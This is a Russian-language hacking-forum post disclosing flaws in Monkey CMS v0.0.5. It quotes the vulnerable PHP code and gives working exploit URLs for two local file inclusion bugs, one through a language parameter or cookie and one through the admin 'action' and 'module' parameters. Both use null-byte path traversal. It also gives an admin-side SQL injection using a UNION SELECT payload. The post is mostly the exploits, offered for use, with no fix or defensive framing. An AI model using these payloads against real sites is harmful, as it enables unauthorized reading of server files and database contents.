Старый 19.02.2011, 16:45   #1
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию Monkey Cms

Monkey Cms
Скачать: http://sourceforge.net/projects/monkey-cms/

LFI
Need:
mq = off

\includes\variables.php
PHP код:
$change $_GET['change'];
//...
$lang $_COOKIE["lang"]; 
\includes\language.php
PHP код:
if (isset($change))
{
    
setcookie("lang"""time()-30000000);
    
setcookie("lang"$changetime()+30000000);
    
header('Location: ' getenv("HTTP_REFERER"));

\includes\common.php
PHP код:
if(!file_exists('languages/'$lang .'/index.php'))
{
    require_once 
'languages/ru/index.php';
}
else
{
    require_once 
'languages/'$lang .'/index.php';

index.php
PHP код:
require_once 'includes/variables.php';
//...
require_once 'includes/language.php';
//...
require_once 'includes/common.php'
Эксплуатация:
Код:
http://localhost/Monkey_CMS_v0.0.5/index.php?change=../robots.txt%00
Либо сразу через куки

LFI
Need:
admin rights
mq = off

/admin/index.php
PHP код:
if(isset($_GET['action']))
{
    if(
file_exists('includes/'.$_GET['action'].'.php'))
    {
        include_once 
'includes/'.$_GET['action'].'.php';
    }
    else
    {
        
utils::showNotice('error''No such page exists!');
    }
}
elseif(isset(
$_GET['module']))
{
    if(
file_exists('modules/'.$_GET['module'].'/index.php'))
    {
        include_once 
'modules/'.$_GET['module'].'/index.php';
    }
    else
    {
        
utils::showNotice('error''No such module exists!');
    }
}
else
{
    include_once 
'includes/default.php';

Эксплуатация:
Код:
http://localhost/Monkey_CMS_v0.0.5/admin/index.php?action=../../robots.txt%00
http://localhost/Monkey_CMS_v0.0.5/admin/index.php?module=../../robots.txt%00
SQLi
Need:
admin rights
mq = off

/admin/includes/edit_content.php
PHP код:
$com $admin->sqlSelect('*''htp_comments'"nid='".$_GET['edit']."'"'id DESC'''''); 
/admin/class/admin.class.php
PHP код:
function sqlSelect($what$from$where=''$order=''$start=''$end='') {

        if(
$where != '') { $where " WHERE ".$where; }
        if(
$order != '') { $order " ORDER BY ".$order; }
        if(
$end != '') { $limit " LIMIT ".$start.", ".$end; }

        
$sql DB::query("SELECT ".$what." FROM ".$from $where $order $limit);
        return 
$sql;
   } 
Эксплуатация:
Код:
http://localhost/Monkey_CMS_v0.0.5/admin/index.php?action=edit_content&edit=1'+union+select+1,2,3,version(),5,6,7,8-- a
~d0s~ вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot